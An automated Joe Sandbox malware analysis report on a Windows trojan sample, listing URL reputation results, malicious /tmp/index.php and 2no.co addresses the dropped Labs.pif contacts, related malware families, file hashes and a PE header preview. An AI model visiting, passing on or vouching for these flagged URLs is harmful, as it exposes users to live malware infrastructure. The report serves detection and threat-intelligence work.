        https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        https://excel.office.com0%URL Reputationsafe
        http://schemas.micro0%URL Reputationsafe
        https://outlook.com0%URL Reputationsafe
        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        https://android.notify.windows.com/iOS0%URL Reputationsafe
        https://api.msn.com/0%URL Reputationsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
        https://www.msn.com:443/en-us/feed0%URL Reputationsafe
        http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php100%Avira URL Cloudmalware
        https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
        https://www.pollensense.com/0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?0%VirustotalBrowse
        https://2no.co/MR)100%Avira URL Cloudmalware
        https://api.msn.com:443/v1/news/Feed/Windows?t0%Avira URL Cloudsafe
        https://www.pollensense.com/0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%VirustotalBrowse
        https://2no.co/16G965ZC100%Avira URL Cloudmalware
        https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter0%Avira URL Cloudsafe
        http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
        http://piratia.su/tmp/index.php100%Avira URL Cloudmalware
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php21%VirustotalBrowse
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
        https://powerpoint.office.com0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%VirustotalBrowse
        http://www.foreca.com0%Avira URL Cloudsafe
        https://powerpoint.office.com0%VirustotalBrowse
        https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
        https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
        http://piratia-life.ru/tmp/index.php100%Avira URL Cloudmalware
        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
        http://www.aimp.ru00%Avira URL Cloudsafe
        http://piratia.su/tmp/index.php16%VirustotalBrowse
        http://www.foreca.com0%VirustotalBrowse
        https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
        https://www.autoitscript.com/autoit3/0%VirustotalBrowse
        http://piratia-life.ru/tmp/index.php16%VirustotalBrowse
        http://icebrasilpr.com/tmp/index.php100%Avira URL Cloudmalware
        http://h-c-v.ru/tmp/index.php100%Avira URL Cloudmalware
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%VirustotalBrowse
        https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc0%Avira URL Cloudsafe
        https://2no.co/16G965100%Avira URL Cloudmalware
        https://2no.co/hR100%Avira URL Cloudmalware
        http://h-c-v.ru/tmp/index.php23%VirustotalBrowse
        http://icebrasilpr.com/tmp/index.php19%VirustotalBrowse
        https://www.msn.com/en-us/weather/topstories/accuweather-el-ni0%Avira URL Cloudsafe
        https://2no.co/16G9654%VirustotalBrowse
        https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        2no.co
        104.21.79.229
        truefalseunknown
        UaTVQmthThJ.UaTVQmthThJ
        unknown
        unknowntrue
          unknown
          206.23.85.13.in-addr.arpa
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://cellc.org/tmp/index.phptrue
          • 21%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://piratia.su/tmp/index.phptrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://piratia-life.ru/tmp/index.phptrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://icebrasilpr.com/tmp/index.phptrue
          • 19%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://h-c-v.ru/tmp/index.phptrue
          • 23%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          https://2no.co/16G965false
          • 4%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000001C.00000000.2307149631.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.autoitscript.com/autoit3/JlSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000000.1277873491.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191675925.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif.2.dr, Orders.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://word.office.comexplorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.pollensense.com/explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000001C.00000000.2299433125.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://2no.co/MR)Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://2no.co/16G965ZCLabs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://powerpoint.office.comexplorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorlSmb6nDsrC.exefalse
          • URL Reputation: safe
          unknown
          https://excel.office.comexplorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.foreca.comexplorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.microexplorer.exe, 0000001C.00000002.2483780350.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2483829342.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2482661406.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.autoitscript.com/autoit3/lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://outlook.comexplorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.aimp.ru0lSmb6nDsrC.exefalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://android.notify.windows.com/iOSexplorer.exe, 0000001C.00000002.2484651579.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307967181.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://2no.co/hRLabs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com:443/en-us/feedexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.21.79.229
          2no.coUnited States
          13335CLOUDFLARENETUSfalse
          IP
          127.0.0.1
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1478963
          Start date and time:2024-07-23 09:19:46 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 17s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:29
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:lSmb6nDsrC.exe
          renamed because original name is a hash value
          Original Sample Name:83741bbca9631aa4925203fbddc0ad7d.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@24/14@3/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 103
          • Number of non-executed functions: 292
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          TimeTypeDescription
          03:20:45API Interceptor1759x Sleep call for process: Labs.pif modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.21.79.229setup.exeGet hashmaliciousUnknownBrowse
            setup.exeGet hashmaliciousUnknownBrowse
              Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                file.exeGet hashmaliciousSmokeLoaderBrowse
                  setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                    setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                      Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              2no.cosetup.exeGet hashmaliciousUnknownBrowse
                              • 104.21.79.229
                              setup.exeGet hashmaliciousUnknownBrowse
                              • 104.21.79.229
                              file.exeGet hashmaliciousXenoRATBrowse
                              • 172.67.149.76
                              Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                              • 104.21.79.229
                              file.exeGet hashmaliciousSmokeLoaderBrowse
                              • 104.21.79.229
                              rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                              • 172.67.149.76
                              setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                              • 104.21.79.229
                              setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                              • 104.21.79.229
                              Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                              • 104.21.79.229
                              qG2cUr0x4A.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                              • 172.67.149.76
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUS245.exeGet hashmaliciousFormBookBrowse
                              • 172.64.41.3
                              BraveBrowserSetup-BRV030.exeGet hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              Sleipnir_Setup.exeGet hashmaliciousLummaCBrowse
                              • 172.67.201.138
                              http://background.apistatexperience.com/Get hashmaliciousUnknownBrowse
                              • 104.21.71.231
                              Sleipnir_Setup.exeGet hashmaliciousLummaCBrowse
                              • 104.21.66.66
                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.27057.11598.rtfGet hashmaliciousRemcosBrowse
                              • 104.21.52.88
                              Order SMG 201906 20190816orderGMD#0498366Deta.exeGet hashmaliciousAgentTesla, RedLineBrowse
                              • 172.67.74.152
                              http://crowdstrike.black/Get hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              file.exeGet hashmaliciousBabadeda, Stealc, VidarBrowse
                              • 172.64.41.3
                              https://www.plumbers.nz/index.php?thememode=full;redirect=https://shared-to-file.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                              • 104.21.30.90
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e192024_._._._.__._-_.exeGet hashmaliciousUnknownBrowse
                              • 104.21.79.229
                              2024_._._._.__._-_.exeGet hashmaliciousUnknownBrowse
                              • 104.21.79.229
                              Tystnendes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.79.229
                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.79.229
                              ndplanernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.79.229
                              CloudInstaller.zipGet hashmaliciousUnknownBrowse
                              • 104.21.79.229
                              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 104.21.79.229
                              #91139_C050.exeGet hashmaliciousAzorult, GuLoaderBrowse
                              • 104.21.79.229
                              crash_fix_v_3.0.exeGet hashmaliciousQulabBrowse
                              • 104.21.79.229
                              Ref_7021929821US20240709031221650.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 104.21.79.229
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifgiupload.exeGet hashmaliciousLummaCBrowse
                                SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exeGet hashmaliciousUnknownBrowse
                                    ZUlr0Vm0Zt.pdfGet hashmaliciousHatef WiperBrowse
                                      CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                        CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                          9YDEsXvk5V.exeGet hashmaliciousVidarBrowse
                                            S9iJqTQS7q.exeGet hashmaliciousRedLineBrowse
                                              bRlvBJEl6T.exeGet hashmaliciousVidarBrowse
                                                WINWORD.exeGet hashmaliciousNetWireBrowse
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):893608
                                                  Entropy (8bit):6.620254876639106
                                                  Encrypted:false
                                                  SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                  MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                  SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                  SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                  SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 7%
                                                  • Antivirus: Virustotal, Detection: 3%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: giupload.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe, Detection: malicious, Browse
                                                  • Filename: ZUlr0Vm0Zt.pdf, Detection: malicious, Browse
                                                  • Filename: CrowdStrike.exe, Detection: malicious, Browse
                                                  • Filename: CrowdStrike.exe, Detection: malicious, Browse
                                                  • Filename: 9YDEsXvk5V.exe, Detection: malicious, Browse
                                                  • Filename: S9iJqTQS7q.exe, Detection: malicious, Browse
                                                  • Filename: bRlvBJEl6T.exe, Detection: malicious, Browse
                                                  • Filename: WINWORD.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):248430
                                                  Entropy (8bit):7.9994139039896295
                                                  Encrypted:true
                                                  SSDEEP:6144:WSeX99XQ0r/PxScf6HaUAisqIbX13nYOh+dtIyV0krz:WSebQuJRNGs1X13YAJwz
                                                  MD5:832180873E27DA9B7A218EC02099691A
                                                  SHA1:09A26D9AC5619DF11650BF11E41C5DD96EA371D2
                                                  SHA-256:19E0ED3240D70F9AC0602C8507CDCB12B448D8F4AEA26F5F0A6913F9517F1A3F
                                                  SHA-512:2ABE2FD0D9E423B75D1D49D28711402C12C20BA7A88AA0C5360DDDED3BAC92F7F07B4FCA874232E8F8C108427F3264E179A1A2F6F96F79AAB1F8F07736F92AB6
                                                  Malicious:false
